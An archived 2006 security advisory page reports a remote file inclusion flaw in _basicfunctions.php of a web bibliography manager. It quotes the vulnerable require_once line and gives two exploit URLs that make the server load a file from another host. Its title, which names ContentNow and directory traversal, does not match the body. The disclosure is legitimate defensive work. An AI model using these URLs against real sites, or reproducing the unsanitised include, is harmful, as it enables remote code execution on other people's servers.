Computer Security

Security Advisory: ContentNow Directory Traversal(upload.php)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  SiteXpress SQL Injection

  SiteXpress SQL Injection

  [Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability

  ASPintranet SQL Injection

From:navairum_(at)_gmail.com <navairum_(at)_gmail.com>
Date:14.11.2006
Subject:ContentNow Directory Traversal(upload.php)

Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php");

/* This function leads the browser to the given location */

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
-----------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
------------

# milw0rm.com [2006-11-14]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru